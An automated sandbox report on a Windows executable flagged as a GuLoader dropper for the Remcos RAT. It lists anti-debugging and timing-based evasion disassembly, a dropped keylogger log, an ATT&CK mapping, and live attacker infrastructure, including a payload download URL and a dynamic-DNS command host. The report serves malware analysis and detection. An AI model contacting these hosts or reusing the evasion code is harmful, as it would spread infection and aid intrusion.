Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F7E99 second address: 00000000020F7E99 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, FE410F8Bh 0x00000013 xor eax, 50497853h 0x00000018 xor eax, DF92CCE2h 0x0000001d add eax, 8E6544C7h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F7AFC461A6Eh 0x0000002e cmp edx, eax 0x00000030 popad 0x00000031 test esi, 5A8E86D2h 0x00000037 call 00007F7AFC461551h 0x0000003c lfence 0x0000003f rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 00000000020F0504 second address: 00000000020F0504 instructions:
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 000000000056734C second address: 000000000056734C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 inc ebx 0x00000004 inc edx 0x00000005 dec ecx 0x00000006 test ecx, ecx 0x00000008 jne 00007F7AFC46130Eh 0x0000000a mov al, byte ptr [edx] 0x0000000c mov byte ptr [ebx], al 0x0000000e pushad 0x0000000f mov ecx, 00000009h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 0000000000568236 second address: 0000000000568261 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b sub esi, 6F48A402h 0x00000011 cmp dword ptr [edi+14h], esi 0x00000014 mov esi, dword ptr [ebp+000001F0h] 0x0000001a je 00007F7AFC9FAF65h 0x0000001c mov dword ptr [ebp+00000246h], eax 0x00000022 mov eax, 3E9A0B50h 0x00000027 pushad 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 0000000000567D0C second address: 0000000000567D0C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00B1C905h 0x00000007 xor eax, AE894D5Ah 0x0000000c xor eax, 9A90F0F9h 0x00000011 add eax, CB578B5Bh 0x00000016 cpuid 0x00000018 test ch, dh 0x0000001a popad 0x0000001b call 00007F7AFC46132Bh 0x00000020 lfence 0x00000023 mov edx, 770EC33Bh 0x00000028 sub edx, 4238A07Dh 0x0000002e xor edx, 9CFEAEA4h 0x00000034 xor edx, D7D68C0Eh 0x0000003a mov edx, dword ptr [edx] 0x0000003c lfence 0x0000003f jmp 00007F7AFC461409h 0x00000044 test ch, ah 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a add edi, edx 0x0000004c dec dword ptr [ebp+000000F8h] 0x00000052 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000059 jne 00007F7AFC46130Ah 0x0000005b cmp edx, eax 0x0000005d call 00007F7AFC46136Ch 0x00000062 call 00007F7AFC46134Eh 0x00000067 lfence 0x0000006a mov edx, 770EC33Bh 0x0000006f sub edx, 4238A07Dh 0x00000075 xor edx, 9CFEAEA4h 0x0000007b xor edx, D7D68C0Eh 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 jmp 00007F7AFC461409h 0x0000008b test ch, ah 0x0000008d ret 0x0000008e mov esi, edx 0x00000090 pushad 0x00000091 rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 0000000000567E99 second address: 0000000000567E99 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, FE410F8Bh 0x00000013 xor eax, 50497853h 0x00000018 xor eax, DF92CCE2h 0x0000001d add eax, 8E6544C7h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F7AFC9FB65Eh 0x0000002e cmp edx, eax 0x00000030 popad 0x00000031 test esi, 5A8E86D2h 0x00000037 call 00007F7AFC9FB141h 0x0000003c lfence 0x0000003f rdtsc
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	RDTSC instruction interceptor: First address: 0000000000562D9E second address: 000000000056734C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push ebx 0x00000004 cmp bx, cx 0x00000007 mov ebx, dword ptr [ebp+000001E5h] 0x0000000d mov dword ptr [ebp+0000023Eh], edi 0x00000013 mov edi, ebx 0x00000015 push edi 0x00000016 mov edi, dword ptr [ebp+0000023Eh] 0x0000001c test cx, ax 0x0000001f mov dword ptr [ebp+00000277h], ecx 0x00000025 mov ecx, edi 0x00000027 push ecx 0x00000028 cmp bx, cx 0x0000002b mov ecx, dword ptr [ebp+00000277h] 0x00000031 call 00007F7AFC465881h 0x00000036 mov ecx, dword ptr [esp+0Ch] 0x0000003a mov edx, dword ptr [esp+08h] 0x0000003e mov ebx, dword ptr [esp+04h] 0x00000042 test ecx, ecx 0x00000044 je 00007F7AFC461338h 0x00000046 test eax, ecx 0x00000048 mov al, byte ptr [edx] 0x0000004a mov byte ptr [ebx], al 0x0000004c pushad 0x0000004d mov ecx, 00000009h 0x00000052 rdtsc

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Code function: 1_2_020F8680 rdtsc

1_2_020F8680

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Window / User API: threadDelayed 9146			Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Window / User API: foregroundWindowGot 461			Jump to behavior

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe TID: 6408	Thread sleep count: 9146 > 30			Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe TID: 6408	Thread sleep time: -45730s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Thread sleep count: Count: 9146 delay: -5

Jump to behavior

Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=http://101.99.94.119/WEALTH_PRUuqVZw139.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmp, LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Code function: 1_2_020F8680 rdtsc

1_2_020F8680

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Code function: 1_2_020F6562 LdrInitializeThunk,

1_2_020F6562

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F8680 mov eax, dword ptr fs:[00000030h]	1_2_020F8680
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F5461 mov eax, dword ptr fs:[00000030h]	1_2_020F5461
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F78E2 mov eax, dword ptr fs:[00000030h]	1_2_020F78E2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F2CF2 mov eax, dword ptr fs:[00000030h]	1_2_020F2CF2
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F735B mov eax, dword ptr fs:[00000030h]	1_2_020F735B
Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe	Code function: 1_2_020F37D8 mov eax, dword ptr fs:[00000030h]	1_2_020F37D8

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Process created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe'

Jump to behavior

Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: logs.dat.13.dr	Binary or memory string: [ Program Manager ]
Source: LzbZ4T1iV8.exe, 0000000D.00000002.1717238543.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\LzbZ4T1iV8.exe

Code function: 1_2_00401A45 cpuid

1_2_00401A45

Stealing of Sensitive Information:

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Masquerading1	Input Capture11	Security Software Discovery621	Remote Services	Input Capture11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion23	LSASS Memory	Virtualization/Sandbox Evasion23	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol212	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery312	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
LzbZ4T1iV8.exe	18%	Virustotal		Browse
LzbZ4T1iV8.exe	18%	ReversingLabs	Win32.Trojan.Vebzenpak
LzbZ4T1iV8.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://101.99.94.119/WEALTH_PRUuqVZw139.bin	1%	Virustotal		Browse
http://101.99.94.119/WEALTH_PRUuqVZw139.bin	0%	Avira URL Cloud	safe
http://101.99.94.119/WEALTH_PRUuqVZw139.bin^	0%	Avira URL Cloud	safe
http://101.99.94.119/WEALTH_PRUuqVZw139.binwininet.dllMozilla/5.0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
wealthyrem.ddns.net	194.5.97.128	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://101.99.94.119/WEALTH_PRUuqVZw139.bin	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://101.99.94.119/WEALTH_PRUuqVZw139.bin^	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://101.99.94.119/WEALTH_PRUuqVZw139.binwininet.dllMozilla/5.0	LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.5.97.128	wealthyrem.ddns.net	Netherlands		208476	DANILENKODE	true
101.99.94.119	unknown	Malaysia		45839	SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	458125
Start date:	02.08.2021
Start time:	21:16:24
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	LzbZ4T1iV8.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Suspected Instruction Hammering Hide Perf
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 37% (good quality ratio 15.7%) Quality average: 21.8% Quality standard deviation: 28.5%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 104.42.151.234, 20.50.102.62, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.190.160.4, 20.190.160.132, 20.190.160.6, 20.190.160.69, 20.190.160.2, 20.190.160.73, 20.190.160.75, 20.190.160.67, 93.184.220.29, 51.104.136.2, 51.11.168.232 Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, www.tm.lg.prod.aadmsa.akadns.net, settings-win.data.microsoft.com, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, ocsp.digicert.com, login.live.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
194.5.97.128	kGSHiWbgq9.exe	Get hash	malicious	Browse
194.5.97.128	loKmeabs9V.exe	Get hash	malicious	Browse
101.99.94.119	kGSHiWbgq9.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_PRUuqVZw139.bin
101.99.94.119	loKmeabs9V.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_PRUuqVZw139.bin

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
wealthyrem.ddns.net	kGSHiWbgq9.exe	Get hash	malicious	Browse	194.5.97.128
wealthyrem.ddns.net	loKmeabs9V.exe	Get hash	malicious	Browse	194.5.97.128

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	kGSHiWbgq9.exe	Get hash	malicious	Browse	101.99.94.119
	loKmeabs9V.exe	Get hash	malicious	Browse	101.99.94.119
	Audio #Ud83d#Udcde lifewire.org.HTML	Get hash	malicious	Browse	111.90.141.176
	bitratencrypt.exe	Get hash	malicious	Browse	111.90.149.108
	svchost.exe	Get hash	malicious	Browse	111.90.149.108
	eVF243bmXC.exe	Get hash	malicious	Browse	111.90.149.108
	xSnF0lxFUX.exe	Get hash	malicious	Browse	111.90.146.149
	QppmM7JmZd.exe	Get hash	malicious	Browse	111.90.146.149
	vNiyRd4GcH.exe	Get hash	malicious	Browse	111.90.146.149
	4E825059CDC8C2116FF7737EEAD0E6482A2CBF0A5790D.exe	Get hash	malicious	Browse	111.90.146.149
	SecuriteInfo.com.Trojan.Win32.Save.a.2038.exe	Get hash	malicious	Browse	101.99.94.204
	Minutes of Meeting 22062021.exe	Get hash	malicious	Browse	111.90.147.240
	naxpJ9fFZ4.exe	Get hash	malicious	Browse	111.90.149.115
	dMH1IIv1a1.exe	Get hash	malicious	Browse	111.90.149.115
	bmaphis@cardinaltek.com_16465506 AMDocAtt.HTML	Get hash	malicious	Browse	111.90.140.91
	4cDyOofgzT.xlsm	Get hash	malicious	Browse	101.99.95.230
	4cDyOofgzT.xlsm	Get hash	malicious	Browse	101.99.95.230
	341288734918_06172021.xlsm	Get hash	malicious	Browse	101.99.95.230
	341288734918_06172021.xlsm	Get hash	malicious	Browse	101.99.95.230
	kctD8brhzU.exe	Get hash	malicious	Browse	111.90.146.149
DANILENKODE	kGSHiWbgq9.exe	Get hash	malicious	Browse	194.5.97.128
	loKmeabs9V.exe	Get hash	malicious	Browse	194.5.97.128
	1niECmfIcE.exe	Get hash	malicious	Browse	194.5.97.94
	Nuzbcdoajgupgalxelbnohzzeonlplvuro.exe	Get hash	malicious	Browse	194.5.98.7
	RueoUfi1MZ.exe	Get hash	malicious	Browse	194.5.98.3
	Departamento de contadores Consejos de pago 0.exe	Get hash	malicious	Browse	194.5.98.7
	04_extracted.exe	Get hash	malicious	Browse	194.5.97.18
	scanorder01321.jar	Get hash	malicious	Browse	194.5.98.243
	scanorder01321.jar	Get hash	malicious	Browse	194.5.98.243
	PO.exe	Get hash	malicious	Browse	194.5.98.23
	PO B4007121.exe	Get hash	malicious	Browse	194.5.98.7
	WzOSphO1Np.exe	Get hash	malicious	Browse	194.5.98.107
	QUOTATION-007222021.exe	Get hash	malicious	Browse	194.5.97.145
	PO B4007121.exe	Get hash	malicious	Browse	194.5.98.7
	ORDER407-395.exe	Get hash	malicious	Browse	194.5.98.23
	Bank Copy.pdf.exe	Get hash	malicious	Browse	194.5.98.8
	FATURAA No.072221.exe	Get hash	malicious	Browse	194.5.98.158
	Document.1-xml.eml.exe	Get hash	malicious	Browse	194.5.98.136
	2 ( P-O DRAWINGS ) SUPPLY PRODUCT.exe	Get hash	malicious	Browse	194.5.98.212
	ynFBVCYIcu.exe	Get hash	malicious	Browse	194.5.98.195

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\remcos\logs.dat Download File
Process:	C:\Users\user\Desktop\LzbZ4T1iV8.exe
File Type:	data
Category:	dropped
Size (bytes):	148
Entropy (8bit):	3.3453987070874214
Encrypted:	false
SSDEEP:	3:rklKlmvNcWKlRNU5JWRal2Jl+7R0DAlBG4LNQblovDl9il:IlKIazlbU5YcIeeDAlybW/G
MD5:	526F50323013D504471A1ACE38B89693
SHA1:	1D2CB4B5DADA7C1036CDBB57F350F2F318E5DBDF
SHA-256:	ACD440D4CB49505D3F6479A3BA54F12C5D5071D28F38A5038A98EBEFC7F1C987
SHA-512:	6F97E249C67F013EEF04E73C5A46E99EAD1FF8231E8FB2337E7CEFFD386BE4AE21DFEBC13C7CDF2680A884E431E08DF43621B1F51D9ACAD7A9CBCAA3946877E0
Malicious:	false
Reputation:	low
Preview:	....[.2.0.2.1./.0.8./.0.2. .2.1.:.1.8.:.5.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r. .].....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.659892921422715
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	LzbZ4T1iV8.exe
File size:	114688
MD5:	41e1bc9de5f3b61639fb88143e933ff8
SHA1:	432531c5a0f7f82b8ec10e7f3fde1b51ebd3d0e8
SHA256:	d32cf33f8f64824f799ca44e9988ddc517e88db1235f93792d3ed2ddaa48e35f
SHA512:	75135a1977450f914d77247938987ee40b45443ebb187ff7b7a2b1c83f9b1f32744b0ccdefecc7df20ec4be01543bac216fc56de8fbf18448625140c1b4264fe
SSDEEP:	1536:rI3BiEocy06WRx+Hfzae+8S6JxdQC+gz6DN1QmiPYlmcy06W++eI3B:rEvBD2C6byC+g6NzlVB++
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....TU.................@..........D........P....@................

File Icon


Icon Hash:	352d25253517a525

Static PE Info

General
Entrypoint:	0x401144
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x555407E7 [Thu May 14 02:26:47 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5565993a5a9f2bfb76f28ab304be6bc1

Entrypoint Preview

Instruction
push 00406B40h
call 00007F7AFCA82725h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], ah
or dword ptr [edi+512C9312h], ebx
inc edx
test eax, FF47123Eh
add dl, byte ptr [ebx-07h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
inc edx
add byte ptr [esi], al
push eax
add dword ptr [ecx], 53h
push ebp
inc edx
dec ecx
dec esi
inc esi
inc ebp
push ebp
inc esp
inc ecx
push esp
inc ebp
add byte ptr [eax], ch
or eax, dword ptr [ebx]
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
pop es
pop edi
push ecx
xchg eax, edx
add ebp, esp
inc ebp
fiadd dword ptr [ecx-78h]
jp 00007F7AFCA826D5h
arpl word ptr [esi-5Dh], bx
daa
push 0000005Fh
adc al, 07h
pop ds
enter 7288h, 4Dh
stosb
ret
jp 00007F7AFCA82776h
fdivr qword ptr [edi+4F3AAE67h]
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push edx
pop ecx
add byte ptr [eax], al
sub byte ptr [eax+00h], bl
add byte ptr [eax], al
or eax, dword ptr [eax]
push eax
inc ecx
dec esp
dec esp
inc edx
inc ebp
inc ecx
push edx
inc ebp
push edx
push ebx
add byte ptr [43000701h], cl
inc ebp
dec ebp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14b74	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17000	0x5b9e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x7c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x13df4	0x14000	False	0.652099609375	data	7.08169017725	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x15000	0x115c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x17000	0x5b9e	0x6000	False	0.545817057292	data	6.02928789817	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1bcf6	0xea8	data
RT_ICON	0x1b44e	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 3457162792, next used block 3459124259
RT_ICON	0x1aee6	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x1893e	0x25a8	data
RT_ICON	0x17896	0x10a8	data
RT_ICON	0x1742e	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x173d4	0x5a	data
RT_VERSION	0x171e0	0x1f4	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, _CIatan, _allmul, _CItan, _CIexp

Version Infos

Description	Data
Translation	0x0404 0x04b0
ProductVersion	1.00
InternalName	GYMNOSPERMAE
FileVersion	1.00
OriginalFilename	GYMNOSPERMAE.exe
ProductName	COMANAGE

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2021 21:20:11.784956932 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:11.833715916 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.833933115 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:11.882823944 CEST	80	49766	101.99.94.119	192.168.2.4
